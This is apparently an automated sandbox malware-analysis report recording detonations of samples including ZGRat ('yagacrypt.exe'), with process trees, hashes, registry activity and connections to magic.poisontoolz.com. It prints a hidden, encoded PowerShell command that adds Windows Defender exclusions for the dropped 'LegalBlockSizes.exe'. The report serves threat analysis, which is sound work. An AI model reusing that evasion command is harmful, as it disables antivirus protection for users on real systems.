| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
memory/4480-1221-0x00000000072A0000-0x0000000007352000-memory.dmp
memory/4480-1223-0x0000000007100000-0x0000000007122000-memory.dmp
memory/4480-1224-0x00000000088B0000-0x0000000008C04000-memory.dmp
memory/4480-1225-0x0000000074CA0000-0x0000000075450000-memory.dmp
memory/4480-1226-0x00000000057C0000-0x00000000057D0000-memory.dmp
C:\Users\Admin\AppData\Local\e2bed16f33a1d21c74bd6ea14529f635\msgid.dat
| MD5 | 9d694ab3d634fb05b97a4b4e72a69c3d |
| SHA1 | c71f80418ae48b90d4128ab03ac26e4c8c8f8c41 |
| SHA256 | b61a8732dc7f3679fa4e0cf02bdbc1d61a813adaafa9df7a0aba53d9127902f9 |
| SHA512 | a7eb902af143b7aeae5fb063c303ff90023dce6d16c40e09f1fa7847c453f0e3864f7623daefe9a4d1f71a8c75f27b55ed9bfd0c137e8d607b1fbbd4c5b26327 |
memory/4480-1238-0x0000000007730000-0x000000000773A000-memory.dmp
memory/4480-1239-0x00000000057C0000-0x00000000057D0000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231222-en
Max time kernel
0s
Max time network
148s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2460 wrote to memory of 1620 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
| PID 2460 wrote to memory of 1620 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
| PID 2460 wrote to memory of 1620 | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | C:\Program Files (x86)\Windows Media Player\setup_wm.exe |
Processes
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Spaufgty.wav"
C:\Program Files (x86)\Windows Media Player\setup_wm.exe
"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Spaufgty.wav"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | wmploc.dll | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 31.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | dbbe3b2e56558f128653635d80156427 |
| SHA1 | 692dcec13ab48af5614982611af2cc048a30035f |
| SHA256 | 62ea3456f7158f1d8fa340cdcb9e7cf18f4763c66829c0aba175f6cd873e8961 |
| SHA512 | e47e76b71849f45a54b172762dcd023d6bdf03d37e3c22f33424a986863a24741352a7f021ea974cd42f15424ec6cf64dc436c16ea11f6572407bc09541c5a08 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | d44d10fd7d523b4d7a542884b3d0c6c0 |
| SHA1 | 802e80c8ed851937837bbe3e125d82a6b9a62adc |
| SHA256 | 41536c80d8df63804cbea59bfaab27bf06e8ae682b88a961a2c4a66db5bc15e5 |
| SHA512 | 363963e55185b9e3a13f2de14c3170548172556d432defb358e7d28a2dba6c7f3cfb6a2891ca2f5fc99e8bc13bbf51973bbede5765a6ee9f15bf9f89622213e4 |
Analysis: behavioral26
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
149s
Max time network
159s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4044 set thread context of 208 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe |
| PID 3740 set thread context of 5080 | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe |
| PID 5080 set thread context of 4404 | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\yagacrypt.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
Files
memory/4044-0-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/4044-1-0x00000000003B0000-0x00000000003C4000-memory.dmp
memory/4044-2-0x00000000027B0000-0x00000000027C0000-memory.dmp
memory/4044-3-0x0000000002780000-0x0000000002786000-memory.dmp
memory/4044-4-0x0000000005880000-0x00000000059AA000-memory.dmp
memory/4044-5-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-6-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-8-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-10-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-12-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-18-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-20-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-24-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-26-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-22-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-16-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-14-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-28-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-30-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-32-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-34-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-36-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-38-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-42-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-46-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-50-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-52-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-56-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-60-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-62-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-64-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-58-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-66-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-54-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-48-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-44-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-40-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-68-0x0000000005880000-0x00000000059A3000-memory.dmp
memory/4044-937-0x00000000059C0000-0x00000000059C1000-memory.dmp
memory/4044-938-0x0000000005BA0000-0x0000000005C60000-memory.dmp
memory/4044-939-0x0000000005CA0000-0x0000000005CEC000-memory.dmp
memory/4044-940-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/4044-941-0x00000000027B0000-0x00000000027C0000-memory.dmp
memory/4044-942-0x0000000006490000-0x0000000006A34000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yagacrypt.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/208-946-0x0000000000400000-0x000000000049C000-memory.dmp
memory/208-947-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/208-949-0x0000000003110000-0x0000000003120000-memory.dmp
memory/208-948-0x00000000056D0000-0x00000000057B8000-memory.dmp
memory/4044-952-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/208-3179-0x0000000005830000-0x0000000005886000-memory.dmp
memory/208-3180-0x0000000005AC0000-0x0000000005B26000-memory.dmp
memory/208-3181-0x0000000005EF0000-0x0000000005F44000-memory.dmp
memory/208-3182-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/208-3184-0x0000000074B00000-0x00000000752B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d42etw3k.fcj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2308-3190-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp
memory/2308-3191-0x000001C2DC300000-0x000001C2DC310000-memory.dmp
memory/2308-3196-0x000001C2DC2D0000-0x000001C2DC2F2000-memory.dmp
memory/2308-3197-0x000001C2DC300000-0x000001C2DC310000-memory.dmp
memory/2308-3200-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp
C:\Users\Admin\AppData\Local\IsInvalid\ugqwo\LegalBlockSizes.exe
| MD5 | 0abd42634db4f4fb3bbbcaa066413d68 |
| SHA1 | 074f62ae3b24d775f09e98e81e857e6f1be05f3b |
| SHA256 | a2ac7be629121924985b42fdf34380efe12be78a3d8665b625a2eae80808cff4 |
| SHA512 | 578ef89e668c8e38e66353f485be2b90ebf8ec21bcf0f5de0ec65ee0710b55256876f28219e540beaf2dea41224c51355dc9a39930cfa3b231b3450264ac47d2 |
memory/3740-3203-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/3740-3204-0x0000000005350000-0x0000000005360000-memory.dmp
memory/3740-4137-0x0000000005FF0000-0x0000000005FF1000-memory.dmp
memory/5080-4143-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/5080-4144-0x0000000005130000-0x0000000005140000-memory.dmp
memory/3740-4145-0x0000000005350000-0x0000000005360000-memory.dmp
memory/3740-4146-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/4404-6376-0x0000000074B00000-0x00000000752B0000-memory.dmp
memory/5080-6377-0x0000000074B00000-0x00000000752B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/1468-6748-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp
memory/1468-6765-0x00000159D10E0000-0x00000159D10F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/1468-7031-0x00000159D10E0000-0x00000159D10F0000-memory.dmp
memory/1468-7192-0x00000159D10E0000-0x00000159D10F0000-memory.dmp
memory/4404-7325-0x0000000005990000-0x0000000005991000-memory.dmp
memory/1468-7327-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp
memory/4404-7328-0x0000000074B00000-0x00000000752B0000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
153s
Max time network
160s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RIB.pdf"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FF7CE518D4EC21B0743587B82E6ECC8E --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7D6AC1F5870E0F078293E6A6E0CDAEF5 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7D6AC1F5870E0F078293E6A6E0CDAEF5 --renderer-client-id=2 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
